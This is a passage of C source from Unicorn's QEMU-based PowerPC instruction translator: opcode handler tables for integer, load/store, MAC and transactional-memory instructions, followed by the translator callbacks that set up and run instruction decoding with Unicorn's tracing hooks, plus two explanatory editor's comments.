0x1F, 0x12, 0x1C, 0x00000000, PPC_BOOKE), GEN_HANDLER2(tlbwe_440, "tlbwe", 0x1F, 0x12, 0x1E, 0x00000001, PPC_BOOKE), GEN_HANDLER2_E(tlbre_booke206, "tlbre", 0x1F, 0x12, 0x1D, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(tlbsx_booke206, "tlbsx", 0x1F, 0x12, 0x1C, 0x00000000, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(tlbwe_booke206, "tlbwe", 0x1F, 0x12, 0x1E, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(tlbivax_booke206, "tlbivax", 0x1F, 0x12, 0x18, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(tlbilx_booke206, "tlbilx", 0x1F, 0x12, 0x00, 0x03800001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER2_E(msgsnd, "msgsnd", 0x1F, 0x0E, 0x06, 0x03ff0001, PPC_NONE, PPC2_PRCNTL), GEN_HANDLER2_E(msgclr, "msgclr", 0x1F, 0x0E, 0x07, 0x03ff0001, PPC_NONE, PPC2_PRCNTL), GEN_HANDLER2_E(msgsync, "msgsync", 0x1F, 0x16, 0x1B, 0x00000000, PPC_NONE, PPC2_PRCNTL), GEN_HANDLER(wrtee, 0x1F, 0x03, 0x04, 0x000FFC01, PPC_WRTEE), GEN_HANDLER(wrteei, 0x1F, 0x03, 0x05, 0x000E7C01, PPC_WRTEE), GEN_HANDLER(dlmzb, 0x1F, 0x0E, 0x02, 0x00000000, PPC_440_SPEC), GEN_HANDLER_E(mbar, 0x1F, 0x16, 0x1a, 0x001FF801, PPC_BOOKE, PPC2_BOOKE206), GEN_HANDLER(msync_4xx, 0x1F, 0x16, 0x12, 0x039FF801, PPC_BOOKE), GEN_HANDLER2_E(icbt_440, "icbt", 0x1F, 0x16, 0x00, 0x03E00001, PPC_BOOKE, PPC2_BOOKE206), GEN_HANDLER2(icbt_440, "icbt", 0x1F, 0x06, 0x08, 0x03E00001, PPC_440_SPEC), GEN_HANDLER(lvsl, 0x1f, 0x06, 0x00, 0x00000001, PPC_ALTIVEC), GEN_HANDLER(lvsr, 0x1f, 0x06, 0x01, 0x00000001, PPC_ALTIVEC), GEN_HANDLER(mfvscr, 0x04, 0x2, 0x18, 0x001ff800, PPC_ALTIVEC), GEN_HANDLER(mtvscr, 0x04, 0x2, 0x19, 0x03ff0000, PPC_ALTIVEC), 
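/*
 * Editor's note: the _E variants (GEN_HANDLER_E / GEN_HANDLER2_E) carry a
 * second feature word -- entries such as the booke206 tlbre/tlbsx/tlbwe
 * above pass PPC_NONE for the legacy flag and gate on a PPC2_* bit from
 * insns_flags2 instead -- while the "2" variants (e.g. tlbld_6xx vs.
 * tlbld_74xx) let several C symbols share one mnemonic string.
 */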
GEN_HANDLER(vmladduhm, 0x04, 0x11, 0xFF, 0x00000000, PPC_ALTIVEC), #if defined(TARGET_PPC64) GEN_HANDLER_E(maddhd_maddhdu, 0x04, 0x18, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(maddld, 0x04, 0x19, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER2_E(msgsndp, "msgsndp", 0x1F, 0x0E, 0x04, 0x03ff0001, PPC_NONE, PPC2_ISA207S), GEN_HANDLER2_E(msgclrp, "msgclrp", 0x1F, 0x0E, 0x05, 0x03ff0001, PPC_NONE, PPC2_ISA207S), #endif #undef GEN_INT_ARITH_ADD #undef GEN_INT_ARITH_ADD_CONST #define GEN_INT_ARITH_ADD(name, opc3, add_ca, compute_ca, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x0A, opc3, 0x00000000, PPC_INTEGER), #define GEN_INT_ARITH_ADD_CONST(name, opc3, const_val, \ add_ca, compute_ca, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x0A, opc3, 0x0000F800, PPC_INTEGER), GEN_INT_ARITH_ADD(add, 0x08, 0, 0, 0) GEN_INT_ARITH_ADD(addo, 0x18, 0, 0, 1) GEN_INT_ARITH_ADD(addc, 0x00, 0, 1, 0) GEN_INT_ARITH_ADD(addco, 0x10, 0, 1, 1) GEN_INT_ARITH_ADD(adde, 0x04, 1, 1, 0) GEN_INT_ARITH_ADD(addeo, 0x14, 1, 1, 1) GEN_INT_ARITH_ADD_CONST(addme, 0x07, -1LL, 1, 1, 0) GEN_INT_ARITH_ADD_CONST(addmeo, 0x17, -1LL, 1, 1, 1) GEN_HANDLER_E(addex, 0x1F, 0x0A, 0x05, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_INT_ARITH_ADD_CONST(addze, 0x06, 0, 1, 1, 0) GEN_INT_ARITH_ADD_CONST(addzeo, 0x16, 0, 1, 1, 1) #undef GEN_INT_ARITH_DIVW #define GEN_INT_ARITH_DIVW(name, opc3, sign, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x0B, opc3, 0x00000000, PPC_INTEGER) GEN_INT_ARITH_DIVW(divwu, 0x0E, 0, 0), GEN_INT_ARITH_DIVW(divwuo, 0x1E, 0, 1), GEN_INT_ARITH_DIVW(divw, 0x0F, 1, 0), GEN_INT_ARITH_DIVW(divwo, 0x1F, 1, 1), GEN_HANDLER_E(divwe, 0x1F, 0x0B, 0x0D, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divweo, 0x1F, 0x0B, 0x1D, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divweu, 0x1F, 0x0B, 0x0C, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divweuo, 0x1F, 0x0B, 0x1C, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(modsw, 0x1F, 0x0B, 0x18, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(moduw, 0x1F, 0x0B, 0x08, 0x00000001, PPC_NONE, PPC2_ISA300), #if defined(TARGET_PPC64) #undef GEN_INT_ARITH_DIVD #define GEN_INT_ARITH_DIVD(name, opc3, sign, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x09, opc3, 0x00000000, PPC_64B) GEN_INT_ARITH_DIVD(divdu, 0x0E, 0, 0), GEN_INT_ARITH_DIVD(divduo, 0x1E, 0, 1), GEN_INT_ARITH_DIVD(divd, 0x0F, 1, 0), GEN_INT_ARITH_DIVD(divdo, 0x1F, 1, 1), GEN_HANDLER_E(divdeu, 0x1F, 0x09, 0x0C, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divdeuo, 0x1F, 0x09, 0x1C, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divde, 0x1F, 0x09, 0x0D, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(divdeo, 0x1F, 0x09, 0x1D, 0, PPC_NONE, PPC2_DIVE_ISA206), GEN_HANDLER_E(modsd, 0x1F, 0x09, 0x18, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(modud, 0x1F, 0x09, 0x08, 0x00000001, PPC_NONE, PPC2_ISA300), #undef GEN_INT_ARITH_MUL_HELPER #define GEN_INT_ARITH_MUL_HELPER(name, opc3) \ GEN_HANDLER(name, 0x1F, 0x09, opc3, 0x00000000, PPC_64B) GEN_INT_ARITH_MUL_HELPER(mulhdu, 0x00), GEN_INT_ARITH_MUL_HELPER(mulhd, 0x02), GEN_INT_ARITH_MUL_HELPER(mulldo, 0x17), #endif #undef GEN_INT_ARITH_SUBF #undef GEN_INT_ARITH_SUBF_CONST #define GEN_INT_ARITH_SUBF(name, opc3, add_ca, compute_ca, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x08, opc3, 0x00000000, PPC_INTEGER), #define GEN_INT_ARITH_SUBF_CONST(name, opc3, const_val, \ add_ca, compute_ca, compute_ov) \ GEN_HANDLER(name, 0x1F, 0x08, opc3, 0x0000F800, PPC_INTEGER), GEN_INT_ARITH_SUBF(subf, 0x01, 0, 0, 0) GEN_INT_ARITH_SUBF(subfo, 0x11, 0, 0, 1) GEN_INT_ARITH_SUBF(subfc, 0x00, 0, 1, 0) 
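/*
 * Editor's note, inferred from the entries above rather than stated in the
 * source: the OE (overflow-enable, "o"-suffixed) form of each integer
 * arithmetic op sits at opc3 + 0x10 -- add 0x08/addo 0x18, subf 0x01/subfo
 * 0x11, divw 0x0F/divwo 0x1F -- which is why the GEN_INT_ARITH_* macros
 * thread a compute_ov flag through alongside add_ca/compute_ca.
 */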
GEN_INT_ARITH_SUBF(subfco, 0x10, 0, 1, 1) GEN_INT_ARITH_SUBF(subfe, 0x04, 1, 1, 0) GEN_INT_ARITH_SUBF(subfeo, 0x14, 1, 1, 1) GEN_INT_ARITH_SUBF_CONST(subfme, 0x07, -1LL, 1, 1, 0) GEN_INT_ARITH_SUBF_CONST(subfmeo, 0x17, -1LL, 1, 1, 1) GEN_INT_ARITH_SUBF_CONST(subfze, 0x06, 0, 1, 1, 0) GEN_INT_ARITH_SUBF_CONST(subfzeo, 0x16, 0, 1, 1, 1) #undef GEN_LOGICAL1 #undef GEN_LOGICAL2 #define GEN_LOGICAL2(name, tcg_op, opc, type) \ GEN_HANDLER(name, 0x1F, 0x1C, opc, 0x00000000, type) #define GEN_LOGICAL1(name, tcg_op, opc, type) \ GEN_HANDLER(name, 0x1F, 0x1A, opc, 0x00000000, type) GEN_LOGICAL2(and, tcg_gen_and_tl, 0x00, PPC_INTEGER), GEN_LOGICAL2(andc, tcg_gen_andc_tl, 0x01, PPC_INTEGER), GEN_LOGICAL2(eqv, tcg_gen_eqv_tl, 0x08, PPC_INTEGER), GEN_LOGICAL1(extsb, tcg_gen_ext8s_tl, 0x1D, PPC_INTEGER), GEN_LOGICAL1(extsh, tcg_gen_ext16s_tl, 0x1C, PPC_INTEGER), GEN_LOGICAL2(nand, tcg_gen_nand_tl, 0x0E, PPC_INTEGER), GEN_LOGICAL2(nor, tcg_gen_nor_tl, 0x03, PPC_INTEGER), GEN_LOGICAL2(orc, tcg_gen_orc_tl, 0x0C, PPC_INTEGER), #if defined(TARGET_PPC64) GEN_LOGICAL1(extsw, tcg_gen_ext32s_tl, 0x1E, PPC_64B), #endif #if defined(TARGET_PPC64) #undef GEN_PPC64_R2 #undef GEN_PPC64_R4 #define GEN_PPC64_R2(name, opc1, opc2) \ GEN_HANDLER2(name##0, stringify(name), opc1, opc2, 0xFF, 0x00000000, PPC_64B),\ GEN_HANDLER2(name##1, stringify(name), opc1, opc2 | 0x10, 0xFF, 0x00000000, \ PPC_64B) #define GEN_PPC64_R4(name, opc1, opc2) \ GEN_HANDLER2(name##0, stringify(name), opc1, opc2, 0xFF, 0x00000000, PPC_64B),\ GEN_HANDLER2(name##1, stringify(name), opc1, opc2 | 0x01, 0xFF, 0x00000000, \ PPC_64B), \ GEN_HANDLER2(name##2, stringify(name), opc1, opc2 | 0x10, 0xFF, 0x00000000, \ PPC_64B), \ GEN_HANDLER2(name##3, stringify(name), opc1, opc2 | 0x11, 0xFF, 0x00000000, \ PPC_64B) GEN_PPC64_R4(rldicl, 0x1E, 0x00), GEN_PPC64_R4(rldicr, 0x1E, 0x02), GEN_PPC64_R4(rldic, 0x1E, 0x04), GEN_PPC64_R2(rldcl, 0x1E, 0x08), GEN_PPC64_R2(rldcr, 0x1E, 0x09), GEN_PPC64_R4(rldimi, 0x1E, 0x06), #endif #undef GEN_LD #undef GEN_LDU #undef GEN_LDUX #undef GEN_LDX_E #undef GEN_LDS #define GEN_LD(name, ldop, opc, type) \ GEN_HANDLER(name, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_LDU(name, ldop, opc, type) \ GEN_HANDLER(name##u, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_LDUX(name, ldop, opc2, opc3, type) \ GEN_HANDLER(name##ux, 0x1F, opc2, opc3, 0x00000001, type), #define GEN_LDX_E(name, ldop, opc2, opc3, type, type2, chk) \ GEN_HANDLER_E(name##x, 0x1F, opc2, opc3, 0x00000001, type, type2), #define GEN_LDS(name, ldop, op, type) \ GEN_LD(name, ldop, op | 0x20, type) \ GEN_LDU(name, ldop, op | 0x21, type) \ GEN_LDUX(name, ldop, 0x17, op | 0x01, type) \ GEN_LDX(name, ldop, 0x17, op | 0x00, type) GEN_LDS(lbz, ld8u, 0x02, PPC_INTEGER) GEN_LDS(lha, ld16s, 0x0A, PPC_INTEGER) GEN_LDS(lhz, ld16u, 0x08, PPC_INTEGER) GEN_LDS(lwz, ld32u, 0x00, PPC_INTEGER) #if defined(TARGET_PPC64) GEN_LDUX(lwa, ld32s, 0x15, 0x0B, PPC_64B) GEN_LDX(lwa, ld32s, 0x15, 0x0A, PPC_64B) GEN_LDUX(ld, ld64_i64, 0x15, 0x01, PPC_64B) GEN_LDX(ld, ld64_i64, 0x15, 0x00, PPC_64B) GEN_LDX_E(ldbr, ld64ur_i64, 0x14, 0x10, PPC_NONE, PPC2_DBRX, CHK_NONE) /* HV/P7 and later only */ GEN_LDX_HVRM(ldcix, ld64_i64, 0x15, 0x1b, PPC_CILDST) GEN_LDX_HVRM(lwzcix, ld32u, 0x15, 0x18, PPC_CILDST) GEN_LDX_HVRM(lhzcix, ld16u, 0x15, 0x19, PPC_CILDST) GEN_LDX_HVRM(lbzcix, ld8u, 0x15, 0x1a, PPC_CILDST) #endif GEN_LDX(lhbr, ld16ur, 0x16, 0x18, PPC_INTEGER) GEN_LDX(lwbr, ld32ur, 0x16, 0x10, PPC_INTEGER) /* External PID based load */ #undef GEN_LDEPX #define GEN_LDEPX(name, ldop, opc2, opc3) \ 
GEN_HANDLER_E(name##epx, 0x1F, opc2, opc3, \ 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_LDEPX(lb, DEF_MEMOP(MO_UB), 0x1F, 0x02) GEN_LDEPX(lh, DEF_MEMOP(MO_UW), 0x1F, 0x08) GEN_LDEPX(lw, DEF_MEMOP(MO_UL), 0x1F, 0x00) #if defined(TARGET_PPC64) GEN_LDEPX(ld, DEF_MEMOP(MO_Q), 0x1D, 0x00) #endif #undef GEN_ST #undef GEN_STU #undef GEN_STUX #undef GEN_STX_E #undef GEN_STS #define GEN_ST(name, stop, opc, type) \ GEN_HANDLER(name, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_STU(name, stop, opc, type) \ GEN_HANDLER(stop##u, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_STUX(name, stop, opc2, opc3, type) \ GEN_HANDLER(name##ux, 0x1F, opc2, opc3, 0x00000001, type), #define GEN_STX_E(name, stop, opc2, opc3, type, type2, chk) \ GEN_HANDLER_E(name##x, 0x1F, opc2, opc3, 0x00000000, type, type2), #define GEN_STS(name, stop, op, type) \ GEN_ST(name, stop, op | 0x20, type) \ GEN_STU(name, stop, op | 0x21, type) \ GEN_STUX(name, stop, 0x17, op | 0x01, type) \ GEN_STX(name, stop, 0x17, op | 0x00, type) GEN_STS(stb, st8, 0x06, PPC_INTEGER) GEN_STS(sth, st16, 0x0C, PPC_INTEGER) GEN_STS(stw, st32, 0x04, PPC_INTEGER) #if defined(TARGET_PPC64) GEN_STUX(std, st64_i64, 0x15, 0x05, PPC_64B) GEN_STX(std, st64_i64, 0x15, 0x04, PPC_64B) GEN_STX_E(stdbr, st64r_i64, 0x14, 0x14, PPC_NONE, PPC2_DBRX, CHK_NONE) GEN_STX_HVRM(stdcix, st64_i64, 0x15, 0x1f, PPC_CILDST) GEN_STX_HVRM(stwcix, st32, 0x15, 0x1c, PPC_CILDST) GEN_STX_HVRM(sthcix, st16, 0x15, 0x1d, PPC_CILDST) GEN_STX_HVRM(stbcix, st8, 0x15, 0x1e, PPC_CILDST) #endif GEN_STX(sthbr, st16r, 0x16, 0x1C, PPC_INTEGER) GEN_STX(stwbr, st32r, 0x16, 0x14, PPC_INTEGER) #undef GEN_STEPX #define GEN_STEPX(name, ldop, opc2, opc3) \ GEN_HANDLER_E(name##epx, 0x1F, opc2, opc3, \ 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_STEPX(stb, DEF_MEMOP(MO_UB), 0x1F, 0x06) GEN_STEPX(sth, DEF_MEMOP(MO_UW), 0x1F, 0x0C) GEN_STEPX(stw, DEF_MEMOP(MO_UL), 0x1F, 0x04) #if defined(TARGET_PPC64) GEN_STEPX(std, DEF_MEMOP(MO_Q), 0x1D, 0x04) #endif #undef GEN_CRLOGIC #define GEN_CRLOGIC(name, tcg_op, opc) \ GEN_HANDLER(name, 0x13, 0x01, opc, 0x00000001, PPC_INTEGER) GEN_CRLOGIC(crand, tcg_gen_and_i32, 0x08), GEN_CRLOGIC(crandc, tcg_gen_andc_i32, 0x04), GEN_CRLOGIC(creqv, tcg_gen_eqv_i32, 0x09), GEN_CRLOGIC(crnand, tcg_gen_nand_i32, 0x07), GEN_CRLOGIC(crnor, tcg_gen_nor_i32, 0x01), GEN_CRLOGIC(cror, tcg_gen_or_i32, 0x0E), GEN_CRLOGIC(crorc, tcg_gen_orc_i32, 0x0D), GEN_CRLOGIC(crxor, tcg_gen_xor_i32, 0x06), #undef GEN_MAC_HANDLER #define GEN_MAC_HANDLER(name, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x00000000, PPC_405_MAC) GEN_MAC_HANDLER(macchw, 0x0C, 0x05), GEN_MAC_HANDLER(macchwo, 0x0C, 0x15), GEN_MAC_HANDLER(macchws, 0x0C, 0x07), GEN_MAC_HANDLER(macchwso, 0x0C, 0x17), GEN_MAC_HANDLER(macchwsu, 0x0C, 0x06), GEN_MAC_HANDLER(macchwsuo, 0x0C, 0x16), GEN_MAC_HANDLER(macchwu, 0x0C, 0x04), GEN_MAC_HANDLER(macchwuo, 0x0C, 0x14), GEN_MAC_HANDLER(machhw, 0x0C, 0x01), GEN_MAC_HANDLER(machhwo, 0x0C, 0x11), GEN_MAC_HANDLER(machhws, 0x0C, 0x03), GEN_MAC_HANDLER(machhwso, 0x0C, 0x13), GEN_MAC_HANDLER(machhwsu, 0x0C, 0x02), GEN_MAC_HANDLER(machhwsuo, 0x0C, 0x12), GEN_MAC_HANDLER(machhwu, 0x0C, 0x00), GEN_MAC_HANDLER(machhwuo, 0x0C, 0x10), GEN_MAC_HANDLER(maclhw, 0x0C, 0x0D), GEN_MAC_HANDLER(maclhwo, 0x0C, 0x1D), GEN_MAC_HANDLER(maclhws, 0x0C, 0x0F), GEN_MAC_HANDLER(maclhwso, 0x0C, 0x1F), GEN_MAC_HANDLER(maclhwu, 0x0C, 0x0C), GEN_MAC_HANDLER(maclhwuo, 0x0C, 0x1C), GEN_MAC_HANDLER(maclhwsu, 0x0C, 0x0E), GEN_MAC_HANDLER(maclhwsuo, 0x0C, 0x1E), GEN_MAC_HANDLER(nmacchw, 0x0E, 0x05), GEN_MAC_HANDLER(nmacchwo, 0x0E, 
0x15), GEN_MAC_HANDLER(nmacchws, 0x0E, 0x07), GEN_MAC_HANDLER(nmacchwso, 0x0E, 0x17), GEN_MAC_HANDLER(nmachhw, 0x0E, 0x01), GEN_MAC_HANDLER(nmachhwo, 0x0E, 0x11), GEN_MAC_HANDLER(nmachhws, 0x0E, 0x03), GEN_MAC_HANDLER(nmachhwso, 0x0E, 0x13), GEN_MAC_HANDLER(nmaclhw, 0x0E, 0x0D), GEN_MAC_HANDLER(nmaclhwo, 0x0E, 0x1D), GEN_MAC_HANDLER(nmaclhws, 0x0E, 0x0F), GEN_MAC_HANDLER(nmaclhwso, 0x0E, 0x1F), GEN_MAC_HANDLER(mulchw, 0x08, 0x05), GEN_MAC_HANDLER(mulchwu, 0x08, 0x04), GEN_MAC_HANDLER(mulhhw, 0x08, 0x01), GEN_MAC_HANDLER(mulhhwu, 0x08, 0x00), GEN_MAC_HANDLER(mullhw, 0x08, 0x0D), GEN_MAC_HANDLER(mullhwu, 0x08, 0x0C), GEN_HANDLER2_E(tbegin, "tbegin", 0x1F, 0x0E, 0x14, 0x01DFF800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tend, "tend", 0x1F, 0x0E, 0x15, 0x01FFF800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabort, "tabort", 0x1F, 0x0E, 0x1C, 0x03E0F800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabortwc, "tabortwc", 0x1F, 0x0E, 0x18, 0x00000000, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabortwci, "tabortwci", 0x1F, 0x0E, 0x1A, 0x00000000, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabortdc, "tabortdc", 0x1F, 0x0E, 0x19, 0x00000000, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tabortdci, "tabortdci", 0x1F, 0x0E, 0x1B, 0x00000000, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tsr, "tsr", 0x1F, 0x0E, 0x17, 0x03DFF800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(tcheck, "tcheck", 0x1F, 0x0E, 0x16, 0x007FF800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(treclaim, "treclaim", 0x1F, 0x0E, 0x1D, 0x03E0F800, \ PPC_NONE, PPC2_TM), GEN_HANDLER2_E(trechkpt, "trechkpt", 0x1F, 0x0E, 0x1F, 0x03FFF800, \ PPC_NONE, PPC2_TM), #include "translate/fp-ops.inc.c" #include "translate/vmx-ops.inc.c" #include "translate/vsx-ops.inc.c" #include "translate/dfp-ops.inc.c" #include "translate/spe-ops.inc.c" }; #include "helper_regs.h" #include "translate_init.inc.c" static void ppc_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); CPUPPCState *env = cs->env_ptr; int bound; // unicorn setup ctx->uc = cs->uc; ctx->exception = POWERPC_EXCP_NONE; ctx->spr_cb = env->spr_cb; ctx->pr = msr_pr; ctx->mem_idx = env->dmmu_idx; ctx->dr = msr_dr; ctx->hv = msr_hv || !env->has_hv_mode; ctx->insns_flags = env->insns_flags; ctx->insns_flags2 = env->insns_flags2; ctx->access_type = -1; ctx->need_access_type = !(env->mmu_model & POWERPC_MMU_64B); ctx->le_mode = !!(env->hflags & (1 << MSR_LE)); ctx->default_tcg_memop_mask = ctx->le_mode ? 
MO_LE : MO_BE; ctx->flags = env->flags; #if defined(TARGET_PPC64) ctx->sf_mode = msr_is_64bit(env, env->msr); ctx->has_cfar = !!(env->flags & POWERPC_FLAG_CFAR); #endif ctx->lazy_tlb_flush = env->mmu_model == POWERPC_MMU_32B || env->mmu_model == POWERPC_MMU_601 || (env->mmu_model & POWERPC_MMU_64B); ctx->fpu_enabled = !!msr_fp; if ((env->flags & POWERPC_FLAG_SPE) && msr_spe) { ctx->spe_enabled = !!msr_spe; } else { ctx->spe_enabled = false; } if ((env->flags & POWERPC_FLAG_VRE) && msr_vr) { ctx->altivec_enabled = !!msr_vr; } else { ctx->altivec_enabled = false; } if ((env->flags & POWERPC_FLAG_VSX) && msr_vsx) { ctx->vsx_enabled = !!msr_vsx; } else { ctx->vsx_enabled = false; } #if defined(TARGET_PPC64) if ((env->flags & POWERPC_FLAG_TM) && msr_tm) { ctx->tm_enabled = !!msr_tm; } else { ctx->tm_enabled = false; } #endif ctx->gtse = !!(env->spr[SPR_LPCR] & LPCR_GTSE); if ((env->flags & POWERPC_FLAG_SE) && msr_se) { ctx->singlestep_enabled = CPU_SINGLE_STEP; } else { ctx->singlestep_enabled = 0; } if ((env->flags & POWERPC_FLAG_BE) && msr_be) { ctx->singlestep_enabled |= CPU_BRANCH_STEP; } if ((env->flags & POWERPC_FLAG_DE) && msr_de) { ctx->singlestep_enabled = 0; target_ulong dbcr0 = env->spr[SPR_BOOKE_DBCR0]; if (dbcr0 & DBCR0_ICMP) { ctx->singlestep_enabled |= CPU_SINGLE_STEP; } if (dbcr0 & DBCR0_BRT) { ctx->singlestep_enabled |= CPU_BRANCH_STEP; } } if (unlikely(ctx->base.singlestep_enabled)) { ctx->singlestep_enabled |= GDBSTUB_SINGLE_STEP; } #if defined(DO_SINGLE_STEP) && 0 /* Single step trace mode */ msr_se = 1; #endif #ifdef _MSC_VER bound = (0 - (ctx->base.pc_first | TARGET_PAGE_MASK)) / 4; #else bound = -(ctx->base.pc_first | TARGET_PAGE_MASK) / 4; #endif ctx->base.max_insns = MIN(ctx->base.max_insns, bound); } static void ppc_tr_tb_start(DisasContextBase *db, CPUState *cs) { } static void ppc_tr_insn_start(DisasContextBase *dcbase, CPUState *cs) { TCGContext *tcg_ctx = cs->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, dcbase->pc_next); } static bool ppc_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cs, const CPUBreakpoint *bp) { DisasContext *ctx = container_of(dcbase, DisasContext, base); gen_debug_exception(ctx); dcbase->is_jmp = DISAS_NORETURN; /* * The address covered by the breakpoint must be included in * [tb->pc, tb->pc + tb->size) in order for it to be properly * cleared -- thus we increment the PC here so that the logic * setting tb->size below does the right thing. 
*/ ctx->base.pc_next += 4; return true; } static void ppc_tr_translate_insn(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); struct uc_struct *uc = ctx->uc; PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = cs->env_ptr; TCGContext *tcg_ctx = ctx->uc->tcg_ctx; opc_handler_t **table, *handler; LOG_DISAS("----------------\n"); LOG_DISAS("nip=" TARGET_FMT_lx " super=%d ir=%d\n", ctx->base.pc_next, ctx->mem_idx, (int)msr_ir); // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, ctx->base.pc_next)) { gen_wait(ctx); return; } // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, ctx->base.pc_next)) { // Sync PC in advance gen_update_nip(ctx, ctx->base.pc_next); gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, uc, ctx->base.pc_next); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } ctx->opcode = translator_ldl_swap(tcg_ctx, env, ctx->base.pc_next, need_byteswap(ctx)); LOG_DISAS("translate opcode %08x (%02x %02x %02x %02x) (%s)\n", ctx->opcode, opc1(ctx->opcode), opc2(ctx->opcode), opc3(ctx->opcode), opc4(ctx->opcode), ctx->le_mode ? "little" : "big"); ctx->base.pc_next += 4; table = cpu->opcodes; handler = table[opc1(ctx->opcode)]; if (is_indirect_opcode(handler)) { table = ind_table(handler); handler = table[opc2(ctx->opcode)]; if (is_indirect_opcode(handler)) { table = ind_table(handler); handler = table[opc3(ctx->opcode)]; if (is_indirect_opcode(handler)) { table = ind_table(handler); handler = table[opc4(ctx->opcode)]; } } } /* Is opcode *REALLY* valid? */ if (unlikely(handler->handler == &gen_invalid)) { qemu_log_mask(LOG_GUEST_ERROR, "invalid/unsupported opcode: " "%02x - %02x - %02x - %02x (%08x) " TARGET_FMT_lx " %d\n", opc1(ctx->opcode), opc2(ctx->opcode), opc3(ctx->opcode), opc4(ctx->opcode), ctx->opcode, ctx->base.pc_next - 4, (int)msr_ir); } else { uint32_t inval; if (unlikely(handler->type & (PPC_SPE | PPC_SPE_SINGLE | PPC_SPE_DOUBLE) && Rc(ctx->opcode))) { inval = handler->inval2; } else { inval = handler->inval1; } if (unlikely((ctx->opcode & inval) != 0)) { qemu_log_mask(LOG_GUEST_ERROR, "invalid bits: %08x for opcode: " "%02x - %02x - %02x - %02x (%08x) " TARGET_FMT_lx "\n", ctx->opcode & inval, opc1(ctx->opcode), opc2(ctx->opcode), opc3(ctx->opcode), opc4(ctx->opcode), ctx->opcode, ctx->base.pc_next - 4); gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); ctx->base.is_jmp = DISAS_NORETURN; return; } } (*(handler->handler))(ctx); #if defined(DO_PPC_STATISTICS) handler->count++; #endif /* Check trace mode exceptions */ if (unlikely(ctx->singlestep_enabled & CPU_SINGLE_STEP && (ctx->base.pc_next <= 0x100 || ctx->base.pc_next > 0xF00) && ctx->exception != POWERPC_SYSCALL && ctx->exception != POWERPC_EXCP_TRAP && ctx->exception != POWERPC_EXCP_BRANCH)) { uint32_t excp = gen_prep_dbgex(ctx); gen_exception_nip(ctx, excp, ctx->base.pc_next); } ctx->base.is_jmp = ctx->exception == POWERPC_EXCP_NONE ? 
DISAS_NEXT : DISAS_NORETURN; } static void ppc_tr_tb_stop(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = cs->uc->tcg_ctx; if (ctx->exception == POWERPC_EXCP_NONE) { gen_goto_tb(ctx, 0, ctx->base.pc_next); } else if (ctx->exception != POWERPC_EXCP_BRANCH) { if (unlikely(ctx->base.singlestep_enabled)) { gen_debug_exception(ctx); } /* Generate the return instruction */ tcg_gen_exit_tb(tcg_ctx, NULL, 0); } } static const TranslatorOps ppc_tr_ops = { .init_disas_context = ppc_tr_init_disas_context, .tb_start = ppc_tr_tb_start, .insn_start = ppc_tr_insn_start, .breakpoint_check = ppc_tr_breakpoint_check, .translate_insn = ppc_tr_translate_insn, .tb_stop = ppc_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext ctx; memset(&ctx, 0, sizeof(ctx)); translator_loop(&ppc_tr_ops, &ctx.base, cs, tb, max_insns); } void restore_state_to_opc(CPUPPCState *env, TranslationBlock *tb, target_ulong *data) { env->nip = data[0]; }
unicorn-2.1.1/qemu/target/ppc/translate/dfp-impl.inc.c
